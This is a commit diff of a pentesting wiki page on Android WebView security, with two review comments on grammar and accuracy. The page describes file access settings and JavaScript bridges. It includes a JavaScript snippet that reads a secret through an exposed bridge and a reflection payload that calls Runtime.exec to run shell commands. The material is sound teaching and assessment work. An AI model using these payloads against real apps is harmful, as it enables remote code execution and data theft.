GitBook: [master] one page modified
This commit is contained in:
parent
ca2a4be2f5
commit
11ca02560d
@ -2,11 +2,6 @@
## Interesting Configurations
### Javascript Enabled
WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled%28boolean%29) is can explicitly enabling or disabling it.
Note that webviews can also support the **`intent`** **scheme** that allows to fire other applications. Read this [writeup to find how to go from XSS to RCE](https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105).
### File Access
_WebView_ file access is enabled by default. Since API 3 \(Cupcake 1.5\) the method [_setAllowFileAccess\(\)_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccess%28boolean%29) is available for explicitly enabling or disabling it.
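Review bot: the +/- markers did not survive the rendering, but the counts in the header (-2,11 +2,6) show that the five lines of the "Javascript Enabled" subsection are being removed here and re-added further down in the second hunk. Since the paragraph is being moved anyway, this is the moment to fix its grammar: `The method setJavaScriptEnabled() is can explicitly enabling or disabling it` should read `The method setJavaScriptEnabled() can be used to explicitly enable or disable it`; otherwise the typo simply travels with the text to its new location.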
@ -48,6 +43,74 @@ The **default value is`false`** when targeting [`Build.VERSION_CODES.R`](https:/
* Use [`getAllowFileAccess()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccess%28%29) to know if the configuration is enabled.
* Use [`setAllowFileAccess(boolean)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccess%28boolean%29) to enable/disable it.
### Javascript Enabled
WebViews have Javascript **disabled by default**. The method [`setJavaScriptEnabled()`](https://developer.android.com/reference/android/webkit/WebSettings.html#setJavaScriptEnabled%28boolean%29) is can explicitly enabling or disabling it.
Note that webviews can also support the **`intent`** **scheme** that allows to fire other applications. Read this [writeup to find how to go from XSS to RCE](https://medium.com/@dPhoeniixx/tiktok-for-android-1-click-rce-240266e78105).
### Javascript Bridge
Android offers a way for JavaScript executed in a WebView to call and use **native functions of an Android app** \(annotated with `@JavascriptInterface`\) by using the [`addJavascriptInterface`](https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29) method. This is known as a _WebView JavaScript bridge_ or _native bridge_.
Please note that **when you use `addJavascriptInterface`, you're explicitly granting access to the registered JavaScript Interface object to all pages loaded within that WebView**. This implies that, if the user navigates outside your app or domain, all other external pages will also have access to those JavaScript Interface objects which might present a potential security risk if any sensitive data is being exposed though those interfaces.
> Warning: Take extreme care with apps targeting Android versions below Android 4.2 \(API level 17\) as they are [vulnerable to a flaw](https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/) in the implementation of `addJavascriptInterface`: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default \(instead of only those annotated\).
#### Static Analysis
```javascript
//Class with a method to access a secret
public class JavascriptBridge {
// Since Android 4.2 (JELLY_BEAN_MR1, API 17) methods
// not annotated with @JavascriptInterface are not visible from JavaScript
@JavascriptInterface
public String getSecret() {
return "SuperSecretPassword";
};
}
```
```javascript
//Enabling Javascript Bridge exposing an object of the JavascriptBridge class
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
webView.reload();
```
```markup
<!-- Exploit to get the secret from JavaScript -->
<script>alert(javascriptBridge.getSecret());</script>
```
With access to the JavaScript code, via, for example, via stored **XSS,** **MITM** attack or a **malicious** **website** that is loaded inside the WebView, can directly call the exposed Java methods.
{% hint style="info" %}
Note that in the case of trying to exploit this vulnerability via an **Open Redirect to an attackers web page that access the Native Android Objet**. If the access to the redirection is done via a mobile **browser** and **not using** the same **WebView**, the **browser won't be able to access the native Android object**.
{% endhint %}
If `addJavascriptInterface` is necessary, take the following considerations:
* **Only JavaScript provided** with the APK should be allowed to use the bridges, e.g. by verifying the URL on each bridged Java method \(via `WebView.getUrl`\).
* **No JavaScript should be loaded from remote endpoint**s, e.g. by keeping page navigation within the app's domains and opening all other domains on the default browser \(e.g. Chrome, Firefox\).
* If necessary for legacy reasons \(e.g. having to support older devices\), **at least set the minimal API level to 17** in the manifest file of the app \(`<uses-sdk android:minSdkVersion="17" />`\).
### Javascript Bridge to RCE via Reflection
As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)\(_check it for ideas in case you obtain RCE_\) ****once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
```markup
<!-- javascriptBridge is the name of the Android exposed object -->
<script>
function execute(cmd){
return javascriptBridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
</script>
```
However modern applications may use the **`@JavascriptInterface` annotation** that indicates to the JavascriptBridge that **only** the method with this annotation should be **exposed**.
In that scenario, you won't be able to abuse Reflection to execute arbitrary code.
## Scenarios
### Javascript Enabled & FileSystemAccess Disabled
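Review bot: the closing claim of the "Javascript Bridge to RCE via Reflection" section ("In that scenario, you won't be able to abuse Reflection to execute arbitrary code") credits the annotation with more than it does on its own. The platform restricts JavaScript to `@JavascriptInterface`-annotated methods only when the app targets API level 17 or higher; an app that still targets API 16 or lower exposes every public method of the injected object even if some of them carry the annotation, and a device running below Android 4.2 does not know the annotation at all. Suggest making the condition explicit ("only when the app targets and runs on API 17+") and, in the mitigation list above it, tying "at least set the minimal API level to 17" to `targetSdkVersion` as well as `minSdkVersion`, so that someone assessing an app checks both manifest values rather than stopping at the presence of the annotation. Two smaller points in the same hunk: the two Java snippets (the `JavascriptBridge` class and the `addJavascriptInterface` call) are fenced as ```javascript and should be ```java, since they are host-app code rather than page script, and the stray `;` after the closing brace of `getSecret()` is an empty declaration that should be dropped. The sentence "With access to the JavaScript code, via, for example, via stored XSS ... can directly call the exposed Java methods" also lacks its subject; "an attacker with access to ... can directly call" reads correctly.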